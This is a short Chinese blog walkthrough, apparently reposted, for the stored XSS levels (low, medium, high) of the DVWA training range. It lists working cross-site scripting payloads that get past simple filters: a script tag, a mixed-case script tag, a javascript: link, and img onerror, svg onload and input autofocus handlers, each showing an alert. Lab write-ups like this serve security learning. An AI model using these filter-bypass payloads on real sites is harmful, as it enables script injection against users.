【dvwa靶场:XSS系列】XSS (Stored)低-中-高级别,通关啦
更改name的文本数量限制大小,
其他我们只在name中进行操作
【除了低级可以在message中进行操作】
一、低级low
<script>alert("假客套")</script>二、中级middle
过滤了小写,咱们可以大写
<Script>alert("假客套")</script>点击事件触发弹窗
<a href="javascript:alert('假客套')">点击我触发弹窗</a>三、高级high
过滤了script以及括号,我们使用其他的标签
<img src=x onerror=alert("假客套")><svg onload=alert('假客套');>慎用,会卡哦,需要清除浏览器缓存,再进入dvwa的xss的stored中,再次点击Clear Guestbook
<input onfocus = alert('假客套') autofocus/>原文地址:https://blog.csdn.net/m0_47484034/article/details/143511006
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!